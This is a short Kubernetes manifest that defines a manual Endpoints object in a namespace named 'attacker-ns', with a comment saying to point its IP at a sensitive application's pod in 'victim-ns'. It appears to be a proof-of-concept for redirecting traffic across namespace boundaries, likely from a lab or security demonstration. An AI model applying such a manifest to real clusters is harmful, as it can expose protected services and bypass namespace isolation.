apiVersion: v1
kind: Endpoints
metadata:
  name: public-entry
  namespace: attacker-ns
subsets:
  - addresses:
      - ip: 10.244.0.7   # <-- REPLACE with sensitive-app pod IP in victim-ns
    ports:
      - port: 80
        protocol: TCP

